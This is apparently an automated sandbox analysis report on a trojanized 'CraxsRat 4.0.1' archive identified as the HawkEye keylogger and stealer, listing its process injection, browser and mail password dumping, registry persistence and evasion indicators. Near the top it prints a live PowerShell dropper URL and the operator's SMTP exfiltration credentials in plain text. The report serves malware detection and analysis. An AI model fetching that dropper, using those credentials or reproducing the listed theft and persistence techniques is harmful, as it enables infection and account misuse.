hawkeye | hxxps://cdn[.]discordapp[.]com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4[.]0[.]1[.]zip

Analysis

max time kernel
529s
max time network
507s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
21-06-2023 00:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip

Score

10^/10

hawkeye collection discovery evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/nipkv/raw

Extracted

Credentials

Protocol: smtp
Host:
smtp.zoho.com
Port:
587
Username:
[email protected]
Password:
Nescau71#

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

qrjhwnek.reg1.exe

description	pid	process	target process
PID 2900 created 2508	2900	qrjhwnek.reg1.exe	Explorer.EXE
PID 2900 created 2508	2900	qrjhwnek.reg1.exe	Explorer.EXE
PID 2900 created 2508	2900	qrjhwnek.reg1.exe	Explorer.EXE
PID 2900 created 2508	2900	qrjhwnek.reg1.exe	Explorer.EXE
PID 2900 created 2508	2900	qrjhwnek.reg1.exe	Explorer.EXE

NirSoft MailPassView 6 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/4556-1548-0x0000000000400000-0x0000000000484000-memory.dmp	MailPassView
behavioral1/memory/3688-1562-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral1/memory/3688-1564-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral1/memory/3688-1566-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral1/memory/4556-1567-0x00000000058E0000-0x00000000058F0000-memory.dmp	MailPassView
behavioral1/memory/4556-1586-0x00000000058E0000-0x00000000058F0000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 4 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/4556-1548-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView
behavioral1/memory/4084-1573-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral1/memory/4084-1575-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral1/memory/4084-1589-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4556-1548-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft
behavioral1/memory/3688-1562-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/3688-1564-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/3688-1566-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/4556-1567-0x00000000058E0000-0x00000000058F0000-memory.dmp	Nirsoft
behavioral1/memory/4084-1573-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral1/memory/4084-1575-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral1/memory/4556-1586-0x00000000058E0000-0x00000000058F0000-memory.dmp	Nirsoft
behavioral1/memory/4084-1589-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

116 4960 powershell.exe
118 4960 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

qrjhwnek.reg1.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts qrjhwnek.reg1.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
116	4960	powershell.exe
118	4960	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	qrjhwnek.reg1.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CraxsRat 4.0.1.exeBLACKK.exewinrar-x64-622.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	CraxsRat 4.0.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	BLACKK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	winrar-x64-622.exe

Drops startup file 1 IoCs

Processes:

CraxsRat 4.0.1.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk CraxsRat 4.0.1.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	CraxsRat 4.0.1.exe

Executes dropped EXE 13 IoCs

Processes:

winrar-x64-622.exeuninstall.exeWinRAR.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeBLACKK.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeqrjhwnek.reg0.exeqrjhwnek.reg1.exeqrjhwnek.reg2.exe

pid	process
5052	winrar-x64-622.exe
3772	uninstall.exe
1952	WinRAR.exe
2704	CraxsRat 4.0.1.exe
2372	CraxsRat 4.0.1.exe
952	BLACKK.exe
4848	CraxsRat 4.0.1.exe
2824	CraxsRat 4.0.1.exe
3180	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
1264	qrjhwnek.reg0.exe
2900	qrjhwnek.reg1.exe
5084	qrjhwnek.reg2.exe

Loads dropped DLL 1 IoCs

Processes:

Explorer.EXE

pid process

2508 Explorer.EXE

pid	process
2508	Explorer.EXE

Modifies system executable filetype association 2 TTPs 8 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

uninstall.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

uninstall.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32	uninstall.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	vbc.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

CraxsRat 4.0.1.exeqrjhwnek.reg2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe"	CraxsRat 4.0.1.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	qrjhwnek.reg2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" "	qrjhwnek.reg2.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

119 whatismyipaddress.com
121 whatismyipaddress.com

flow	ioc
119	whatismyipaddress.com
121	whatismyipaddress.com

Suspicious use of SetThreadContext 4 IoCs

Processes:

CraxsRat 4.0.1.exeCraxsRat 4.0.1.exeqrjhwnek.reg1.exe

description	pid	process	target process
PID 2372 set thread context of 4556	2372	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4556 set thread context of 3688	4556	CraxsRat 4.0.1.exe	vbc.exe
PID 4556 set thread context of 4084	4556	CraxsRat 4.0.1.exe	vbc.exe
PID 2900 set thread context of 392	2900	qrjhwnek.reg1.exe	dialer.exe

Drops file in Program Files directory 60 IoCs

Processes:

winrar-x64-622.exeuninstall.exe

description	ioc	process
File created	C:\Program Files\WinRAR\Rar.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Rar.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Zip64.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\7zxa.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExt32.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtPackage.msix	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.lst	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExt32.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinRAR.chm	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarFiles.lst	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Resources.pri	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\zipnew.dat	uninstall.exe
File created	C:\Program Files\WinRAR\__tmp_rar_sfx_access_check_240613437	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\ReadMe.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Uninstall.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\7zxa.dll	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinCon64.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Descript.ion	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WhatsNew.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Order.htm	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Rar.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtInstaller.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinRAR.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Descript.ion	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Rar.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtPackage.msix	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\rarnew.dat	uninstall.exe
File opened for modification	C:\Program Files\WinRAR\WhatsNew.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Uninstall.lst	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Resources.pri	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinCon.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Zip.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\ReadMe.txt	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\License.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Default64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinCon.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Zip.SFX	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.chm	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtInstaller.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Order.htm	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\UnRAR.exe	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\RarExt.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Default.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\WinCon64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\License.txt	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\UnRAR.exe	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarExt.dll	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Default64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\Zip64.SFX	winrar-x64-622.exe
File created	C:\Program Files\WinRAR\RarFiles.lst	winrar-x64-622.exe
File opened for modification	C:\Program Files\WinRAR\Default.SFX	winrar-x64-622.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1280 sc.exe
4868 sc.exe
3196 sc.exe
3280 sc.exe
4892 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1280	sc.exe
4868	sc.exe
3196	sc.exe
3280	sc.exe
4892	sc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133317804125845429"	chrome.exe

Modifies registry class 64 IoCs

Processes:

uninstall.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lzh	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tbz\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r17\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r22\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r06\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.7z	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.7z\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r00	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r16	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.arj	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r02	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r24	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r04	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ShellNew	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lha\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tar\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r07	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bz	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r17	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r25\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zst	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r04\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xxe\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r09\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cab	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.gz	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.001	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r19	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r12\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lz	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r18	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.r29\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r22	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.r15	uninstall.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exe

pid	process
3592	chrome.exe
3592	chrome.exe
4444	chrome.exe
4444	chrome.exe
4960	powershell.exe
4960	powershell.exe
2372	CraxsRat 4.0.1.exe
2372	CraxsRat 4.0.1.exe
2372	CraxsRat 4.0.1.exe
2372	CraxsRat 4.0.1.exe
2372	CraxsRat 4.0.1.exe
2372	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe
4556	CraxsRat 4.0.1.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

3592 chrome.exe
3592 chrome.exe
3592 chrome.exe
3592 chrome.exe
3592 chrome.exe
3592 chrome.exe
3592 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
